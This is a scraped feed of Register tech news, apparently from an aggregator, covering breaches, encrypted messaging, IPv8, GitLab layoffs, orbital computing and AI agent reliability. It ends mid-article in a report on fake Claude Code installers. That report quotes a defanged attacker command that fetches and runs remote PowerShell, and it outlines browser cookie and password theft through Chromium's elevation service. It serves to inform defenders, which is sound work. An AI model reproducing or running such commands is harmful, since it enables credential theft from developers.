TheRegister
Windows update prompt joins the Post Office queue
BORK!BORK!BORK! "Let's cross this one off your list" are words to strike fear into the hearts of many a Windows user, particularly when they appear on some Post Office digital signage. Spotted by an eagle-eyed Register reader in East Dulwich, London, the screen is one of two public displays designed to entertain and inform customers waiting to be ignored by a member of staff. The Post Office is a place where objects can be sent and forms completed or collected. It is normally identifiable by a queue of depressed citizens snaking toward (and sometimes beyond) the door, and an impressive ability to have not quite enough staff to ensure all available positions are open. Here, Windows is thankfully relegated to serving up information rather than the all-important task of announcing available counters. The English may be patient queuers, but even they would baulk at a mechanical voice declaring "IRQL_NOT_LESS_OR_EQUAL", followed by the news that Windows needed to dump its memory before service could resume. That said, using Microsoft's finest to run an information screen does seem overkill. "I've always been amazed that a full-fat OS is used on a system that only has to perform a trivial function," our reader noted, and we'd have to agree, particularly when Windows, in this instance, doesn't even seem able to do that right. The message, in theory, is helpful. Windows needs an update and is politely asking when a good time would be. The problem is that, without a keyboard and mouse is available nobody in the queue can help. And, frankly, Windows shouldn't need to ask. Considering the opening times of the average Post Office, there is plenty of time when the doors are locked, and there are no punters on hand to witness the operating system giving itself a jolly good update, with a cheeky reboot or two to finish the job. ®
Categories: Linux fréttir
Apple, Google drag cross-platform texting into the encrypted age
Apple and Google have taken a big step toward securing cross-platform texting, ending years of messages bouncing around in glorified plaintext. Apple announced this week that encrypted Rich Communication Services (RCS) messaging is rolling out in beta for iPhone users running iOS 26.5 and Android users on the latest version of Google Messages. The feature works across supported carriers and adds end-to-end encryption to cross-platform chats that were still taking the scenic route through carrier-era messaging infrastructure. Users will know it's enabled when a lock icon appears in RCS conversations. Apple says E2EE RCS messages cannot be read while traveling between devices, bringing Android-to-iPhone chats closer to the protections offered by WhatsApp and Signal. The move lands as other platforms head in the opposite direction. Earlier this month, Meta confirmed it was backing away from parts of its encryption rollout for Instagram DMs, telling The Register that "very few" people actually used the feature and suggesting privacy-minded users head over to WhatsApp instead. Apple, meanwhile, appears content to lean harder into the privacy angle, finally plugging one of the more obvious holes in modern messaging security. That gap has been hanging around for years. While iMessage chats between Apple devices were already encrypted, conversations involving Android phones could fall back to SMS or unencrypted RCS, depending on carrier support. Google had offered encrypted RCS chats inside Google Messages for years, but only when both sides used Google's ecosystem. Apple joining the party means cross-platform RCS encryption is finally starting to span the two largest mobile ecosystems. The rollout is still marked as beta, and carrier support varies by region, so not everyone will get encrypted chats immediately. UK availability remains unclear for now, as none of the major UK networks currently appear on Apple's published compatibility lists for the feature. Still, after two decades of the mobile industry insisting that interoperability and security could not coexist, cross-platform texting may finally be catching up with the rest of modern messaging. ®
Categories: Linux fréttir
ZTE and Claro launch next-generation 4K Ultra HD IP STB in Brazil
Partner Content ZTE Corporation and Claro have launched a new 4K Ultra HD IP STB in Brazil, combining stunning visuals, intelligent voice control and rich content, introducing a new generation of 4K Ultra HD set-top box (STB) in Brazil – bringing together stunning Ultra HD visuals, intelligent voice control, fast connectivity, and rich content into one seamless experience. Against the backdrop of the sustained rapid development of Brazil's digital TV and streaming media business, user requirements for video quality, interactive experience, and network performance continue to rise. ZTE together with Claro, officially launched the new-generation 4K Ultra HD IP STB Z4KW6, bringing “Ultra HD + Intelligent Voice + High-Speed Connectivity + Massive Content” comprehensively to Brazilian households and driving a further upgrade of the digital entertainment experience. Built for the next era of digital TV and streaming, it delivers sharper picture quality and effortless hands-free interaction with far-field voice, making everything feel faster, smoother, and more intuitive. With enhanced connectivity, streaming stays smooth – even in peak usage hours of multi-device homes. And with a rich content ecosystem, all entertainment comes together in one place. Designed for simplicity and built for performance, the Z4KW6 sets a new benchmark for home entertainment. This launch marks a new step forward for home entertainment in Brazil – smarter, faster, and more immersive than ever.
Categories: Linux fréttir
FleetWave outage takes another turn. Chevin confirms crooks accessed customer data
A month after Chevin Fleet Solutions declared its FleetWave outage contained and systems restored, the company has now admitted that attackers accessed customer databases and potentially acquired operational and personal data. Chevin confirmed the breach in an email to customers, seen by The Register, marking the first time it has acknowledged that data was accessed during the April incident that knocked parts of web-based software offline across the UK and US. At the time, Chevin said it had pulled parts of its Azure-hosted FleetWave tool offline while outside cybersecurity specialists investigated. Status pages showed a "major outage" across the UK and US, but beyond that, customers got little detail on what had happened or whether any data had been caught up in it. Now it turns out that at least some customer databases were indeed affected by the breach. According to the email, Chevin’s forensic investigation determined that an "unauthorized third-party accessed and potentially acquired certain data" from customer databases backed up on April 3, 2026. The exposed information varies depending on how customers configured FleetWave, but includes operational fleet management data alongside personal information such as names, contact details, and payroll numbers. It’s unclear how many individuals and organizations have been affected. The Register’s asked for comment and a spokesperson told us: "Chevin recently experienced a cybersecurity incident affecting certain systems. We immediately took steps to contain the incident, engaged with law enforcement and external cybersecurity experts, and have since restored impacted services. "Following consultation with external cybersecurity forensic experts, we are confident our systems have been secured. Our customers are our top priority, and we are working directly with those impacted." The company insists that the stolen information does not generally include any of the higher-risk categories under GDPR, such as financial information, payment card details, passport data, or special category data. Chevin also claims in its email to customers that it has taken steps to stop the information from being "published, sold, or misused," and says ongoing dark web monitoring has not identified evidence of the data circulating online. One Chevin customer told The Register their organization was unlikely to have been the intended ransomware target due to its size, suggesting the breach may have been aimed elsewhere. The customer also questioned why Chevin appeared confident enough to restore systems and close out forensic work before later returning with confirmation that data had in fact been accessed. The customer said the mention of payroll numbers came as a surprise because their company does not use FleetWave for payroll data, raising questions about how tailored the notification really was. Chevin is now offering affected customers a one-time download of their SQL database and a spreadsheet summarizing potentially exposed records through a secure portal. In the email, signed by CEO Gary Thompson, Chevin says it is "confident that the incident has been contained" and FleetWave systems are now "safe and secure for customers." ®
Categories: Linux fréttir
Britain pays Starlink millions despite Musk's calls to overthrow UK government
Britain's Ministry of Defence (MoD) has clocked up a £16.6 million ($22.6 million) bill with Starlink over the past four years, despite SpaceX CEO Elon Musk expressing a desire to overthrow the UK government. Data released by the MoD shows that Britain has continued to pay for access to the spaceborne data network, primarily to help support the Ukrainian military in its ongoing battle against the Russian invasion. Not all of the expenditure is accounted for by Ukraine, however. Some goes toward providing British military personnel serving overseas with a vital link home. According to Business Matters, upward of 50,000 Starlink terminals have been sent to Ukraine since the start of the war in 2022. Initially, the cost of helping that nation's frontline communications was borne by Starlink itself, with some grumbling from Musk, who controls the company's parent business, SpaceX. However, a year later the satellite operator clinched an official US government contract covering the Starlink service for Ukraine, which we understand is still funded by the Department of Defense (DoD), although President Trump has not sought congressional approval for any new funding for US military assistance to Ukraine since returning to office. The UK appears to be footing part of the Starlink bill. The MoD acknowledged the figure, with some spending understood to cover terminals gifted to Ukraine, including their purchase and airtime. However, the MoD seems keen to emphasize that Starlink is not being used for any kind of military purposes by British forces. "Starlink technology is not used for military operations and is primarily used by our hardworking personnel to stay connected with their loved ones when they're in areas without regular internet access, for example on a warship," a spokesperson told The Register. "As the public would rightly expect, all spending is rigorously checked to ensure it delivers value for taxpayers' money and spend on Starlink has significantly reduced in the last year." Ukraine uses Starlink for battlefield communications and remote control of drones. The sum is modest in relation to the entire UK defense budget, on track to hit £62.2 billion ($85 billion) for FY 2025/26. It is also likely just covering a small part of the Ukrainian service costs, as Starlink was asking for $400 million per year to cover these at one point. Some Brits may feel uncomfortable paying a man who has openly called for the overthrow of the British government. Earlier this year, Musk publicly mused whether the US should "liberate the people of Britain from their tyrannical government." No, it wasn't on April 1. ®
Categories: Linux fréttir
Japan’s PM orders cybersecurity review to stop Mythos going full CyberZilla
Japan’s prime minister Sanae Takaichi has ordered a review of government cybersecurity strategy, citing the arrival of Anthropic’s bug-hunting model Mythos as a moment that makes it necessary to order a cabinet-level project. In a Tuesday cabinet meeting, the PM instructed cybersecurity minister Hisashi Matsumoto to devise measures to check the state of government systems to determine whether it’s possible to detect and fix vulnerabilities, and to develop a plan to ensure critical infrastructure operators can do likewise. Japan’s leader ordered the checks because she feels Mythos and similar frontier models may be misused, and that attacks on infrastructure may therefore increase in speed and scale – perhaps even exponentially. Over the last couple of years cybersecurity vendors and researchers have often pointed out that AI models make it possible to find flaws and automate attacks. When Anthropic debuted Mythos in early April, the notion that AI has the potential to vastly complicate the security landscape went mainstream. Many regulators around the world have issued guidance to point out that now is the perfect time to revisit and improve security strategies and capabilities, because Mythos and other AI models mean defenses are going to be tested like never before. India’s securities regulator went a step further by ordering a security review at the organizations it oversees. And now Japan’s leader has decided the matter is of sufficient importance that her office needs to weigh in and set new policy to ensure AI doesn’t go on a destructive rampage through Japanese infrastructure. Whether Takaichi’s urgency is needed is open to debate. Some researchers have said that while Mythos can find bugs at speed, but doesn’t find flaws humans can’t detect with their naked brains. Others suggest Mythos is not vastly better at finding bugs than open source models that pre-date it and are publicly available – unlike Mythos which is restricted to certain users. Others have all but dismissed Mythos as a marketing stunt. ® .
Categories: Linux fréttir
Veteran network architect proposes IPv8 – to improve IPv4, not leapfrog v6
A veteran network architect named James Thain has drafted a proposal for “Internet Protocol Version 8” (IPv8) and hopes to crowdfund work to create a testbed that will demonstrate his ideas. Thain’s proposal appeared as an Internet Engineering Task Force (IETF) Internet-Draft on April 16th. Like all such documents, it has no official standing – the multistakeholder systems under which the internet is governed allow open participation and this is Thain’s contribution. The draft opens with a bold vision for IPv8, describing it as “a managed network protocol suite that transforms how networks of every scale – from home networks to the global internet – are operated, secured, and monitored.” On the IPv8 website he describes it as “a managed network protocol suite that resolves IPv4 exhaustion, unifies network management, and stays 100 percent backward compatible — no flag day, no forced migration.” The draft protocol is also “a proper subset of IPv8. An IPv8 address with the routing prefix field set to zero is an IPv4 address. No existing device, application, or network requires modification.” In conversation with The Register, Thain said he created the IPv8 draft because existing protocols were developed for the networking problems of the day, and things have now well and truly moved on. He also thinks that few organizations other than hyperscalers and network operators have a good reason to adopt IPv6, because it doesn’t offer major improvements over IPv4 and migrations to the newer protocol seldom produce return on investment. He allows that IPv4 exhaustion means many organizations and network operators do need to consider IPv6 but feels the best course of action is to improve IPv4 so users get a better protocol without the need for upgrades. One improvement in IPv8 expands the IPv4 numberspace by adding what he calls an “area code” based on a network operator autonomous system number (ASN), the unique identifiers assigned to networks by regional internet registries. ASNs effectively function as addresses for a network, to inform routing decisions. IPv8 proposes an address format r.r.r.r.n.n.n.n where the “r” is the ASN address encoded as a 32-bit integer and the “n” is a conventional IPv4 address. This scheme means every ASN holder gets 232 host addresses – 4,294,967,296 addresses apiece. Thain thinks that will suffice for almost every organization, and those who need more probably already operate multiple ASNs. His scheme would see the IPv4 numberspace expand to around 30 trillion (3 x 1013) unique addresses. That’s well short of the 340 undecillion 3.4 x 1038 addresses available under IPv6, but Thain thinks it’s still enough and that users will appreciate not having to migrate away from IPv4. “It doesn’t require a ton of changes to Border Gateway Protocol which already knows how to route multiple protocols,” Thain told us. “So does MPLS.” IPv8 therefore “gives you a roll forward of IPv4, you just need servers to translate the ‘area codes’. The rest of the stack is all well-known,” Thain said. “There is no magic here, it is just an area code plus IPv4 Another IPv8 feature is what Thain calls a “Zone server” that his draft explains “runs every service a network segment requires: address assignment (DHCP8), name resolution (DNS8), time synchronisation (NTP8), telemetry collection (NetLog8), authentication caching (OAuth8), route validation (WHOIS8 resolver), access control enforcement (ACL8), and IPv4/IPv8 translation (XLATE8).” IPv8 has caused a stir in internetworking circles, and some at times bitter criticism. Others have been more nuanced. Silvan Gephart of ISP Openfactory blogged about the draft and said “I like that there is a proposal thinking about the routing table, addressing, management, authentication and operational complexity as one bigger problem.” Some of the criticism levelled at the protocol suggests it’s the work of AI. Thain doesn’t shy away from having used chatbots to work on his draft and told The Register he feels doing so is contemporary practice. He thinks he can prove the nay-sayers wrong by building an IPv8 testbed and has commenced a crowdfunding campaign that aims to raise $100,000 to cover the cost of developing open-source software, research and testing infrastructure, plus demos and documentation. You can find the crowdfunding project here. ®
Categories: Linux fréttir
GitLab promises a different kind of layoff as biz pivots toward AI
GitLab has opened the voluntary separation window and hopes an unspecified number of employees will exit the busniess to help it become "the trusted enterprise platform for software creation in the AI era." According to CEO Bill Staples, the company's effort to trim its workforce differs from other AI-related layoffs. "This restructure process is not like others you may be seeing in the news," wrote Staples in a blog post. "Of course AI is changing the way we work and is part of our transformation plan, but this is not an AI optimization or cost cutting exercise." What is it then? Well, according to Staples, GitLab plans to use most of the money it saves by sacking staff to invest in its business. We note that the five fundamental architectural bets at the heart of this business reorientation – agent-specific APIs; reworked CI/CD; a data model for surfacing context; governance; and support for human-owned, agent-assisted, and autonomous workloads – sound like infrastructure investments, the very thing other companies fuel with vacated payroll obligations. But GitLab isn't (so far as we can tell) returning freed funds to investors, initiating a stock buyback, larding executive bonuses, or launching an ill-advised metaverse venture that will consume $80 billion over five years. So maybe that's the difference to which Staples alluded. The other difference Staples cited is his company's plan to have managers chat with employees about staying or going. "Starting today, managers across the company are entering deeper conversations with leadership about how the restructuring principles land inside their teams," he said. "Those conversations will inform the decision of impacted roles." There's no word on the rubric for these retention-or-departure chats. Presumably employees deemed insufficiently enthused about the new direction will be encouraged to exit through the voluntary separation window. Absent that cooperation, defenestration at the hands of managers will likely follow. While Staples has not provided target for the number of desired layoffs – details will be revealed during the company's Q1 FY2027 financial report on June 2nd – he did set a territory footprint goal. "We're reevaluating our operational footprint, and are planning to reduce the number of countries by up to 30 percent where we have small teams," he said. GitLab currently operates in 60 countries. That's a lot of different corporate entities to run, tax laws to master, and offices to rent. The code biz did not immediately respond to a request to clarify how "small teams" is defined. Nor does it disclose its headcount in recent annual reports. According to analytics biz Unify, GitLab has about 1,800 employees, of whom almost 1,500 work outside the US. Another goal of the layoff plan is to reduce GitLab's organizational layers. "We’re flattening our organization because eight layers is too deep for a company our size and management layers are slowing us down," said Staples. GitLab is betting heavily on its Duo Agent Platform (DAP), which entered general availability in January. As recently as its 2025 annual report [PDF], GitLab talked up the possibility of continued hiring. "We intend to grow our international revenue by strategically increasing our investments in international sales and marketing operations, including headcount in the EMEA and APAC regions," the biz said during a more optimistic time. Now, not so much. Beyond other challenges like soft government business, one reason for the AI remake appears to be the company's decision to raise prices back in 2023. In March, during GitLab's Q4 FY2026 [PDF] conference call for investors, Staples admitted that price-sensitive organizations didn't much appreciate having to pay more. "Our 50 percent Premium price increase a few years ago also coincided with rising AI code experimentation and flattish SaaS budgets," he said. "Simultaneously, our upmarket shift reduced technical resources at the lower end of the market. Together, these have slowed Premium growth, particularly among price-sensitive customers which we estimate at roughly 20 percent of our ARR, including the SMB weakness that we have been discussing recently." ®
Categories: Linux fréttir
Red Hat blasts RHEL 10.1 into orbit aboard Voyager's micro datacenter
Red Hat Enterprise Linux 10.1 has powered up on board a datacenter orbiting 250 miles or about 400 km above the earth. That RHEL-powered satellite is Voyager’s LEOcloud Space Edge “micro” datacenter, which launched aboard a SpaceX Falcon 9 rocket and hitched a ride on the International Space Station (ISS) back in September. The system is designed to demonstrate the advantages of processing data gathered directly in orbit, rather than sending info back to a terrestrial conventional datacenter. Voyager boasts the reduction in latency makes the system as much as 30x faster than sending all the data back to Earth. Originally developed by LEOcloud prior to its acquisition by Voyager last year, Space Edge is, as its name suggests, a low-power edge compute platform for orbital data processing. Voyager and Red Hat contend that “as commercial and government organizations increase their reliance on space-based data, the ability to process data in orbit is increasingly critical.” And they certainly wouldn’t be the first to suggest that. Faced with power constraints, SpaceX, Amazon, Google, Nvidia and others have all announced plans to put large clusters of AI datacenters in orbit, with some designs aiming to cram 100kW worth of compute onboard a single satellite. The company hasn’t disclosed the hardware used in Voyager’s Space Edge, stating only that it’s a “space-hardened managed cloud infrastructure.” Hardening is certainly a concern for complex electronics operating outside Earth’s atmosphere, where charged particles and radiation can corrupt data or do permanent damage over time. HPE’s Spacebourne compute platform demonstrated many of these challenges during its first mission aboard the ISS in 2017. Over the course of its mission the system, which was composed of mostly off-the-shelf components, suffered several upsets including a power failure and SSDs that failed at an “alarming rate,” HPE's Mark Fernandez said at the time. We’ve reached out to Voyager for comment on the system and what kind of data its “micro” datacenter will process during its mission. We’ll let you know if we hear anything back. It’s safe to assume Space Edge’s compute capacity is limited compared as promotional images show its systems are little larger than a shoebox - and therefore offer less room for components than servers used on earth. What we do know is that RHEL 10.1, along with Red Hat’s Universal Base Image (UBI), are up and running on the ISS. Specifically, Space Edge is running RHEL in image mode, an immutable build of the OS where changes to the most directories will reset to a known good state upon reboot. This means that any issues related to what they call "configuration drift" can be addressed by turning the machine off and back on again, a feature we’ll sure will be popular among many in the IT crowd. Alongside the base OS, Space Edge is also running Red Hat’s UBI container image under Podman, a container runtime interface (CRI) similar to Docker that is rootless and daemonless by default. RHEL 10.1’s arrival in orbit comes amid renewed interest in space driven by the yearning of every great hyperscaler to boldly go and generate tokens where no one has before. Actually, they have, but not at scale. But that’s exactly what SpaceX, Amazon and others have proposed. In pursuit of unlimited power, the two companies have independently filed to put large constellations of AI satellite compute platforms in sun-synchronous orbit. In February, SpaceX filed an application with the Federal Communications Commission to lob a million space-based datacenters into orbit. Meanwhile, Amazon has proposed a slightly smaller constellation with 51,600 data processing satellites. Of course, these plans do have one small problem left to solve. How will they get those sats into orbit for less than the cost of simply building more terrestrial infrastructure? According to one space datacenter startup, the economics of orbital datacenters won’t be viable until the cost to orbit falls to around $10 per kilogram. As of writing, a rideshare aboard a Falcon 9 runs about $7,000 a kilogram. ®
Categories: Linux fréttir
Securing the Untrusted Agentic Development Layer
Join us to learn how to architect a development environment where your builders and their agents can move fast and securely.
Categories: Linux fréttir
Quit VMware and you’ll emerge with more complex and less capable infrastructure
Organizations that decide to reduce their VMware footprints, or quit Virtzilla entirely, will emerge with more complex and less capable infrastructure. That’s the view of Paul Delory, a research vice president with analyst firm Gartner, who yesterday told the company’s IT Infrastructure, Operations & Cloud Strategies Conference in Sydney that there is no technical reason for VMware users to adopt a rival hypervisor, and that no vendor offers a one-for-one replacement for the virtualization pioneer’s flagship Cloud Foundation (VCF) suite. But Delory said Broadcom’s licensing policies, which see it only sell VCF, mean VMware users’ licensing bills typically rise by 300 to 400 percent. Broadcom argues that the full-stack private clouds VCF makes it possible to build are so efficient that VCF quickly pays for itself. The analyst told the conference he thinks those contemplating a move off VMware will do better if they instead focus on application modernization. But he said Broadcom’s price changes, and the prospect the company might hike prices again in future, mean many VMware users will look elsewhere. Those who do, he warned, will end up with more complex infrastructure for two reasons. One is that few organizations will be able to quit VMware entirely, as they run applications with dependencies that aren’t easy or economical to unwind. Reducing or eliminating a VMware rig therefore means adopting multiple replacements, which creates more infrastructure to manage and therefore extra complexity. The other is that no rival hypervisor can match the efficiency or VM density possible when using VMware’s products, so moving means acquiring more hardware. Delory said the best alternatives to VMware are the public cloud, or HCI vendors – these days that acronym denotes both hyperconverged infrastructure and hybrid cloud infrastructure. The analyst warned that HCI vendors, with the exception of Nutanix, have weak migration tools that will leave users needing to create bespoke migration automations using “Ansible and a Rube Goldberg machine.” Public clouds, he said, will welcome customers who move 1,000 or more VMs with free migration services. He recommended against considering OpenStack, which he said remains “too big, too complex, and has too many moving parts for the typical IT shop to handle effectively.” Delory also warned VMware users that migration projects are significant engineering undertakings that require extensive assessment of every application in a fleet to determine its best destination, and the work required to get it there. He reminded VMware users that not every workload is certified to run under non-VMware hypervisors, and that some vendors now offer cloud-native versions of their wares and therefore offer an easier on-ramp to containerised applications. Delory advised exploring those options, and not making architectural decisions that mean you can’t consider moving off VMware. “VMware is betting that you can’t move off and they can jack the price way up,” he said. “That may be a good bet. But don’t make it easy.” The analyst finished his talk by predicting most users will minimize their VMware footprints, rather than eliminating them, and restated Gartner’s prediction that 35 percent of workloads currently running under VMware will operate on a different platform by 2028. ®
Categories: Linux fréttir
Double Canvas breach acknowledged as ShinyHunters sets new pay-or-leak deadline
Ed-tech giant Instructure confirmed two rounds of unauthorized activity affecting its online learning platform Canvas within two weeks as data-theft-and-extortion crew ShinyHunters threatened to leak data it claims belongs to more than 275 million students, teachers, and staff tied to nearly 9,000 schools worldwide. In a security incident update, Instructure apologized for the disruption when Canvas went offline last Thursday, leaving thousands of colleges, universities, and K-12 schools without access to course materials, grades, and due dates during final exams and Advanced Placement testing for many. As of Saturday, the parent company claimed, “Canvas is fully back online and available for use.” And it finally broke its silence on Monday about what happened, admitting not one but two intrusions after criminals exploited a security vulnerability in its Free-for-Teacher learning system, and saying the data thieves stole information including usernames, email addresses, course names, enrollment information, and messages. “Core learning data (course content, submissions, credentials) was not compromised,” the Monday disclosure said. “We're still validating all findings, but we want to be clear about what we understand was and wasn't affected.” On April 29, the online education firm “detected unauthorized activity in Canvas,” immediately revoked the intruder’s access, and initiated a probe into the breach, according to Instructure’s notice posted on its website. On May 7, the company “identified additional unauthorized activity tied to the same incident.” ShinyHunters defaced about 330 Canvas school login portals, also exploiting the same Free-for-Teacher vulnerability, and that caused the ed-tech firm to take Canvas offline and “into maintenance mode to contain the activity.” ShinyHunters claims it stole 3.65 TB of data, including about 275 million records from about 8,800 schools including Harvard, Columbia, Rutgers, Georgetown, and Stanford universities. After moving the pay-or-leak deadline multiple times, ShinyHunters set a final deadline of end-of-day May 12 for individual institutions to contact them directly to negotiate payment - or the group will publish the full dataset. In response, Instructure said it temporarily shut down its Free-for-Teacher accounts. It also revoked privileged credentials and access tokens tied to compromised systems, rotated internal keys, restricted token creation pathways, and added monitoring across all platforms. The education platform hired CrowdStrike to assist with its forensic analysis and incident response, and said it also notified the FBI - which published its own alert on social media - and the US Cybersecurity and Infrastructure Security Agency. This is Instructure’s second breach in less than a year. ShinyHunters claimed to have breached Instructure's Salesforce environment in September 2025, and while Instructure didn’t name the crew in its latest disclosure, it did address the intrusion. “The prior Salesforce-related incident and this Canvas security incident are distinct events involving different systems and circumstances,” the company said. ®
Categories: Linux fréttir
Rodent-obsessed developer creates Ratty to bring 3D graphics to the command line
When you think of a terminal emulator, you imagine a command line interface filled with ASCII text and a prompt. However, one developer has reimagined the experience to include inline 3D objects and image support. Dubbed Ratty by its creator Orhun Parmaksiz for its 3D spinning rat cursor, the terminal window itself is a 3D canvas that supports sprites and 3D models, can render 3D drawings in real time, and even includes its own graphics protocol. “Terminal emulators are a big part of our daily lives as developers but yet we are not making enough innovations in that space,” Parmaksiz told The Register in an email. “With Ratty I hope to inspire others to experiment with terminals and push the limits of what they can do.” Parmaksiz wrote in his blog post introducing Ratty that he accomplished the whole thing using his own Rust terminal interface library, Ratatui, along with the Bevy game engine, also built with Rust. The aforementioned Ratty Graphics Protocol was created in order to register 3D assets and place them in an anchored terminal cell space. “Ratty separates terminal emulation from presentation: one side handles PTY I/O and terminal parsing, while the other turns the result into a GPU-rendered 2D or 3D scene,” Parmaksiz explained. “This allows for a lot of flexibility in how the terminal output is displayed (e.g. you can warp the whole damn thing).” Ratatui ends up serving as the terminal rendering layer, Parmaksiz explained, taking whatever the terminal state is, rebuilding it in its own buffer, and rendering said buffer onto a texture that is then rendered via Bevy. Given its design, be forewarned if you try to install and run Ratty: It’s going to eat up a lot of memory since it’s running a game engine. “I know, sacrificing 300 MB of RAM just to run a terminal emulator is a lot,” Parmaksiz said. “But everything comes with a cost, especially the spinning rat cursor.” Building the fourth temple Parmaksiz’s desire to push the limits of terminal emulators past their logical limits didn’t come from nowhere - he actually got inspiration from a source that some grey-hairs in the tech community might have been reminded of at the very beginning of this story: TempleOS. For those unfamiliar with TempleOS, it’s an operating system that was developed by the late Terry Davis, a schizophrenic, and arguably genius, software developer who believed he was building the OS at the command of God to serve as a digital Jewish Third Temple. Using TempleOS is an exercise in frustration given its confusing interface, not to mention deliberate constraints (Davis believed its 640x480 desktop, 16-color display, single-voice audio and other features were part of God’s commandment), but it also included a fascinating capability not seen in other OSes: first-class, insertable sprites on the command line. “I was blown away by the creativity and passion behind it,” Parmaksiz told us of TempleOS, noting that 3D command line sprites in the OS were his inspiration for Ratty. “I wanted to see how adopting that to a modern-day terminal emulator would look like and experimented with a couple of other things while I was at it. I'm super happy with the result!” Parmaksiz told us that a number of people instantly caught on to the TempleOS inspiration, and that the feedback has been overwhelmingly positive. That said, he also admitted that most people who’ve used it have been scratching their heads over an actual use case. “I think this will also clarify itself if we give it more time,” Parmaksiz said in his email. “I mean... I really would like to see a full-fledged CAD program in the terminal built with Ratty Graphical Protocol at some point!” Whether that’ll ever happen remains to be seen - this is purely a fun project for now and Parmaksiz isn’t even sure it’s in his personal time budget to continue to maintain. “I'm just testing the waters for now, but the reception has been amazing so far. I would be happy to continue development if people start using Ratty and start developing cool things with it,” Parmaksiz said, noting that the code is open and he’d be thrilled if others contributed. Parmaksiz has developed a Ratatui widget that enables devs to build applications that run in Ratty, like a temple runner knockoff. “My ultimate goal with Ratty is to explore the possibilities of what a terminal can be and inspire new ideas and projects in the terminal space,” Parmaksiz wrote in his blog post. “I believe these kinds of experiments are where creativity is born and I hope to spark some ideas for the future of terminals.” ®
Categories: Linux fréttir
Microsoft researchers find AI models and agents can't handle long-running tasks
Companies exploring automated workflows would be well advised to keep their AI agents on a short leash. Microsoft researchers have found that even the priciest frontier models introduce errors in long workflows, the very thing for which AI software has been pitched. Anthropic, for example, says, "Claude Cowork handles tasks autonomously. Give it a goal and Claude works on your computer, local files, and applications to return a finished deliverable." Redmond promotes similar usage, touting Microsoft 365 Copilot's ability to "Tackle complex, multistep research across your work data and the web." The Windows maker's scientists aren't so sure about that. Philippe Laban, Tobias Schnabel, and Jennifer Neville from Microsoft Research set out to study what happens when large language models (LLMs) are asked to complete multistep tasks. They recently published their findings in a preprint paper with a spoiler title: "LLMs Corrupt Your Documents When You Delegate." To test how LLMs handle long-running knowledge work tasks, the researchers devised a benchmark called DELEGATE-52. It simulates multistep workflows across 52 professional domains, such as writing code, crystallography, and music notation. It is a more taxing test than sorting a spreadsheet, a task that should be table stakes for any aspiring workflow agent. In the accounting domain, for example, the challenge involves a seed document that represents the accounting ledger of Hack Club, a nonprofit organization. The model is asked to split the seed document into separate category-based files and then to merge these chronologically back into a single file. "Our findings show that current LLMs introduce substantial errors when editing work documents, with frontier models (Gemini 3.1 Pro, Claude 4.6 Opus, and GPT 5.4) losing on average 25 percent of document content over 20 delegated interactions, and an average degradation across all models of 50 percent," the authors report. The authors found that LLMs did better on programming tasks and worse on natural language tasks. To be considered "ready" for a given work domain, the researchers set the bar at 98 percent or higher after 20 interactions. They only found one domain qualified: Python programming. For every other domain, the authors found LLMs fell short of "ready." "A per-domain breakdown of end-of-simulation scores reveals that models are not ready for delegated workflows in the vast majority of domains, with models severely corrupting documents (at least -20 percent degradation) in 80 percent of our simulated conditions," the authors state. The study found that "catastrophic corruption," meaning a benchmark score of 80 percent or less, occurred in more than 80 percent of model/domain combinations. The best performing model, Google Gemini 3.1 Pro, was ready for only 11 of 52 domains. In weaker models, degradation took the form of content deletion; in frontier models, it took the form of content corruption. And when errors occurred, they tended to happen all at once, resulting in the loss of 10 to 30 points in a single round-trip interaction, rather than accumulating over the entire test run. "The stronger models (Gemini 3.1 Pro, Claude 4.6, GPT 5.4) aren’t avoiding small errors better, they delay critical failures to later rounds and experience them in fewer interactions," the researchers observe in their paper. The Microsoft authors went on to test how agents – LLMs given access to file reading, writing, and code execution through a basic harness – handle the DELEGATE-52 benchmark. Tools in this instance didn't help. "The four tested models perform worse when operated agentically with tools than without, incurring an average additional degradation of 6 percent by the end of simulation," the authors observe, in reference to GPT-5.4, 5.2, 5.1, and 4.1. Given that task delegation is the whole point of an AI agent – if you wanted to do it yourself, you wouldn't have tried to automate the task – this casts a bit of a shadow on the AI hype train. An intern who corrupted a quarter of a document over a long workflow would be shown the door. Yet companies are showing AI the money: according to Deloitte, organizations are spending an average of 36 percent of their digital budgets on AI automation. That might make sense if arming LLMs with the tools to function as full-blown agents meant less document degradation. But that's not the case. The authors found "using a basic agentic harness does not improve the performance of LLMs" with regard to the DELEGATE-52 test and that LLM performance after two interactions doesn't reflect how models perform after 20, which they argue underscores the need for long-horizon evaluation. "Current LLMs are ready for delegated workflows in some domains such as Python coding, but not in other less common domains," the authors conclude. "In general, users still need to closely monitor LLM systems as they operate and complete tasks on their behalf." Yet they also note that LLMs have been getting better, pointing to the performance of OpenAI's GPT model family, which has seen its benchmark performance increase over 16 months from 14.7 percent to 71.5 percent. ®
Categories: Linux fréttir
Cookie thieves caught stealing dev secrets via fake Claude Code installers
An ongoing campaign steals developers’ secrets via fake Claude Code installers and other popular coding tools, according to Ontinue’s security researchers. The lure - as with several other infostealer attacks targeting developers over the past several months - mimics a legitimate one-line installer for an attacker-controlled command. In this case, the command is “irm https[:]//claude[.]ai/install.ps1 | iex”, and the lure replaced the destination host with “irm events[.]msft23[.]com | iex”. The payload is unique, and doesn’t match up with any documented malware family. It does, however, wreak havoc on developers exfiltrating decrypted cookies, passwords, and payment methods from Chromium-based browsers such as Google Chrome, Microsoft Edge, Brave, Vivaldi, and Opera. According to the threat hunters who documented the new campaign on Monday: “We publish for peer correlation rather than attribution.” The attacks also abuses the IElevator2 COM interface. This is Chromium’s elevation service used to handle App-Bound Encryption (ABE), specifically for encrypting and decrypting sensitive user data like cookies and passwords. Google introduced the new interface in January to protect Chromium-based browser data from cookie thieves, who used earlier ABE bypass techniques and commodity stealers that file-copied the SQLite databases holding cookies and saved passwords. However, crafty crooks (and security researchers) soon figured out workarounds to abuse IElevator2, as is the case with the newly spotted malware. The attack runs across three domains, all registered within six days of each other in April, and all fronted through Cloudflare. It relies on developers searching for “install claude code,” and selecting a sponsored result that leads to a lookalike Claude Code installation page. The page downloads and executes Anthropic’s authentic installer - but as Ontinue’s team found, the malicious instruction isn’t stored in the file itself, but instead rendered into the HTML of the landing page. “Automated scanners, URL reputation services, and any skeptical reviewer who simply curls the URL therefore observe clean PowerShell delivered from a Cloudflare-fronted domain bearing a valid Let’s Encrypt certificate,” the researchers wrote. “Victims, meanwhile, are presented with an entirely different command.” The pasted command redirects victims to an obfuscated PowerShell loader that injects a native AEB helper into a live browser process. The helper’s “exclusive purpose,” we’re told, is to invoke the browser's 